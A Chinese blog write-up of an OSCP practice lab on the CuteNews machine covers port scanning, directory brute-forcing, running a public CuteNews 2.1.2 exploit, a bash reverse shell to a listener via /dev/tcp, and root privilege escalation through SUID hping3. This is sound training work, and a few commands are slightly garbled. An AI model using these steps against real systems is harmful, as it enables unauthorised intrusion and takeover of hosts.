OSCP-CuteNews靶机攻防

简介: OSCP-CuteNews靶机攻防

因为oscp认证 是kali自己的 官方要求使用kali系列进行考试,所以要熟悉这玩意,像msf这种自动化的框架好像还不能使用,限制某些工具。

信息收集

虚拟机上仅主机网络

扫描 192.168.56.0/24

# 快速探测存活主机
nmap -sP 192.168.56.0/24    
# 快速扫描端口
nmap -sV 192.168.56.3 -p1-65535

640.png

发现了 80 88 22端口

老样子,先访问80 88。

http://192.168.56.3/
http://192.168.56.3:88/

一个是apache默认页面 另一个404

目录扫描

发现80端口存在文件

python dirsearch.py http://192.168.56.3/

插件未识别出框架

但是下面的power by 存在网站指纹

640.png

根据cmd指纹,搜索历史漏洞

漏洞攻击

searchsploit CuteNews 2.1.2通过搜索引擎也可以获取exp 在github上


    python /usr/share/exploitdb/exploits/php/webapps/48800.py

      报错了 查看源码 发现默认访问index.php不需要添加cutenews
      所以url = f"{ip}/CuteNews/cdata/users/lines"  去掉所有的CuteNews

      脚本帮忙注册了一个账号,然后获取了一个shell 但权限是www

      反弹shell

        kali监听nc -lvnp 8080
        shell执行echo 'bash -i >& /dev/tcp/192.168.56.4/8080 0&>1' |bash

        640.png

        常规思路的话 flag在root目录下,但现在权限较低,需要提权。也有可能普通用户一个flag root用户一个flag

        权限提升

        sudo -l 查看权限列表

        或者使用find提权

        find / -perm -u=s -type f 2>/dev/null

        使用hping3 进行提权

        # 先获取python的shell bash反弹的shell 
        # 默认权限问题输入sudo 不会弹出密码框而是直接退出
        python3 -c "import pty;pty.spawn('/bin/sh')"

          直接输入 hping3whoamiroot

          获取flag

          这是root用户的,那普通用户应该也会有


          相关文章
          |
          24天前
          |
          Devops Shell 网络安全
          Neos的渗透测试靶机练习——Wakanda
          Neos的渗透测试靶机练习——Wakanda
          18 2
          |
          1月前
          |
          安全 Linux 网络安全
          Kali 渗透测试:利用HTA文件进行渗透攻击
          Kali 渗透测试:利用HTA文件进行渗透攻击
          |
          2月前
          |
          SQL 安全 数据库
          Web安全漏洞专项靶场—SQL注入—docker环境—sqli-labs靶场—详细通关指南
          Web安全漏洞专项靶场—SQL注入—docker环境—sqli-labs靶场—详细通关指南
          258 1
          |
          安全 网络协议 Shell
          HTB-Friendzone靶场
          HTB-Friendzone靶场
          |
          安全 Shell 数据库
          ColddBox 靶场
          渗透这类 CMS 网站时,不要上来就狂扫,它大部分目录都是固定的,开源去看对应版本,商业的找几篇文章。特别 注意的是一定先去找对应版本漏洞,不要自己手工测基本行不通的。
          114 0
          ColddBox 靶场
          |
          SQL 安全 Shell
          FristiLeaks v1.3靶机渗透
          FristiLeaks v1.3靶机渗透
          |
          SQL 开发框架 安全
          记一次H站渗透以及提权
          这个网站所使用的程序是一套自助交换友情链接的ASP脚本程序 直链王.
          pikachu靶场通关秘籍之越权攻击
          pikachu靶场通关秘籍之越权攻击
          253 0
          |
          SQL 安全 关系型数据库
          pikachu靶场通关秘籍之sql注入攻击
          pikachu靶场通关秘籍之sql注入攻击
          388 0
          |
          Go 数据安全/隐私保护
          某教程学习笔记(一):21、后渗透攻击
          某教程学习笔记(一):21、后渗透攻击
          132 0
          某教程学习笔记(一):21、后渗透攻击